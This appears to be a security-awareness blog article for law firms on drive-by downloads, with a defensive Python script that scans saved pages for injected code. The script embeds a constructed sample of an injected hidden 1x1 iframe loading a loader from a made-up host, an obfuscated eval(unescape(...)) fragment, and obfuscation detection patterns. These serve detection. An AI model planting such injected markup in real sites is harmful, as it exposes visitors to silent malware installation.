When people think about malware, they often imagine someone clicking a suspicious attachment or downloading a shady file. In reality, one of the most dangerous forms of infection requires no obvious mistake at all. It’s called a drive-by download, and it remains a quiet but serious threat.
The Threat
A drive-by download occurs when malicious code is installed on a device simply by visiting a compromised website—often without any prompt or warning. According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), these attacks exploit vulnerabilities in browsers, plugins, or operating systems to execute code automatically in the background.
This issue is tough even for top experts. Tom Mighell and Dennis Kennedy offered some suggestions in the Kennedy-Mighell Report (Part B, listener question) regarding unsubscribe links, which are one of the ways a reader can be steered to a page that delivers an exploit. Great ideas, but even their august minds could not come up with a way to have complete security.
What makes drive-by downloads particularly dangerous is how effectively they bypass human judgment. Even cautious users can be exposed. The site involved may be well known and legitimate, but compromised without the owner's knowledge, a tactic documented repeatedly by security researchers. The usual mechanism is an injected hidden iframe or script that silently loads the exploit from a server the attacker controls, so the visitor never leaves the trusted site and sees nothing unusual.
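As an added example, not code from the original article, the following Python script shows what that injection looks like and how a quick triage check can spot it in a saved copy of a page. It flags two classic signs of a compromised legitimate site: an iframe that is hidden or 1x1 and pulls content from a host other than the site's own, and an inline script with several obfuscation markers (eval, unescape, long percent-encoded runs, hex escapes). The sample page, the firm name, and the hostnames in it are constructed for the example.

```python
"""Heuristic scan of a saved web page for injected drive-by delivery code.

Added example (not from the original article). A triage aid only: it does not
prove compromise, and it is no substitute for patching or a real scanner.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample: a normal-looking law-firm page with one injected hidden
# iframe and one obfuscated script. Every hostname here is made up.
SAMPLE_HTML = """
<html><head><title>Smith &amp; Jones LLP</title>
<script src="/static/site.js"></script>
</head><body>
<h1>Welcome</h1>
<p>Our practice areas include estate planning and small-business counsel.</p>
<iframe src="http://cdn-updates.example/loader.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63"))</script>
</body></html>
"""

IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
SCRIPT = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
# attribute name, then a double-quoted, single-quoted, or bare value
ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# CSS tricks used to keep an injected frame off-screen or invisible
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
# markers typical of obfuscated exploit loaders; each match counts as one hit
OBFUSCATION = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|fromCharCode|(?:%[0-9a-f]{2}){8,}|\\x[0-9a-f]{2}", re.I)


@dataclass(frozen=True)
class Finding:
    kind: str     # "hidden_iframe" or "obfuscated_script"
    detail: str


def _attrs(raw):
    """Parse a tag's attribute string into a lowercase-keyed dict."""
    return {k.lower(): (a or b or c) for k, a, b, c in ATTR.findall(raw)}


def _dimension(attrs, name):
    """Return width/height as an int, or None if absent or non-numeric."""
    value = attrs.get(name, "").lower().removesuffix("px")
    return int(value) if value.isdigit() else None


def _is_hidden(attrs):
    w, h = _dimension(attrs, "width"), _dimension(attrs, "height")
    tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
    return tiny or bool(HIDDEN_STYLE.search(attrs.get("style", "")))


def _host(url, site_host):
    """Hostname of a URL; relative URLs resolve to the site's own host."""
    return (urlparse(url).hostname or site_host).lower()


def scan_html(html, site_host):
    """Return a list of Finding objects for suspicious iframes and scripts."""
    site_host = site_host.lower()
    findings = []
    for m in IFRAME.finditer(html):
        a = _attrs(m.group(1))
        src = a.get("src", "")
        # A hidden frame that points at the site's own host is usually benign;
        # a hidden frame pulling from a foreign host is the classic injection.
        if _is_hidden(a) and _host(src, site_host) != site_host:
            findings.append(Finding("hidden_iframe", src))
    for m in SCRIPT.finditer(html):
        markers = OBFUSCATION.findall(m.group(2))
        # One marker alone is common in legitimate minified code; require two.
        if len(markers) >= 2:
            findings.append(Finding("obfuscated_script",
                                    f"{len(markers)} obfuscation markers"))
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "smithjones.example"):
        print(f"{f.kind}: {f.detail}")
```

Run it against a page saved with the browser's "Save as" or fetched with curl, passing the site's own hostname. A hit is not proof of compromise (tag managers and ad networks also use tiny frames and minified code), but a 1x1 or display:none iframe to a host the site does not own is exactly how compromised legitimate sites hand visitors to an exploit server, and it is worth pulling the page from the web server and comparing it against the last known-good copy.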
The consequences range from irritating to severe. Drive-by infections may install information stealers that harvest saved passwords and browser session cookies, or ransomware that encrypts entire systems. The FBI has warned that ransomware attacks increasingly begin with silent exploitation rather than user-initiated downloads (FBI ransomware guidance). In professional environments such as law firms or healthcare organizations, these infections can lead to data breaches, ethical violations, and regulatory exposure.
Attackers favor drive-by techniques because they scale efficiently. A single compromised website can infect thousands of visitors in hours. The National Institute of Standards and Technology (NIST) has identified “watering hole” and drive-by attacks as particularly difficult to detect precisely because victims often never realize how the infection occurred (NIST SP 800-53).
How to Reduce the Risk
No defense is perfect, but layered precautions significantly reduce exposure:
- Keep systems and software updated. Most drive-by attacks exploit known, already-patched vulnerabilities, a point CISA and Microsoft have repeatedly emphasized (Microsoft Security Blog). Remove legacy plugins you no longer need; they are a favorite target.
- Use modern browsers with built-in protections, such as sandboxing, site isolation and exploit mitigation (ZDNet browser recommendations).
- Enable automatic updates for the operating system, the browser and any remaining plugins so patches are applied without waiting for you to act.
- Use reputable security software, which can block the landing pages and payloads of known exploit kits, though not previously unseen (zero-day) exploits (see PC Magazine evaluations and Forbes recommendations). Norton is one option; note that the U.S. Commerce Department prohibited Kaspersky from selling its software in the United States in 2024, so U.S. readers should choose another vendor.
- Limit browser extensions, which expand the attack surface; an extension that asks for access to all sites can read and modify every page you visit (Mozilla extension security guidance).
- Follow least-privilege practices: work from a standard, non-administrator account so that a browser exploit does not automatically gain control of the whole machine (NIST least-privilege principle).
Mac OS vs. MS Windows?
Mac users sometimes believe they don’t need to worry as much about such threats. There is something to this, but the issue is more complicated than commonly believed. Kaspersky has a good summary of the relevant considerations.
Windows can be very safe if it is set up and monitored by skilled IT pros. Most small and solo law firms don't have this, so my sense is that macOS tends to be safer for them because it reduces the number of choices the user has to get right. Windows reduces risk by enabling control, but only if that control is actually exercised by skilled IT pros.
Summary
Drive-by downloads are dangerous not because users are careless, but because the attacks are engineered to exploit trust and invisibility. Awareness, combined with basic digital hygiene, remains the most reliable defense.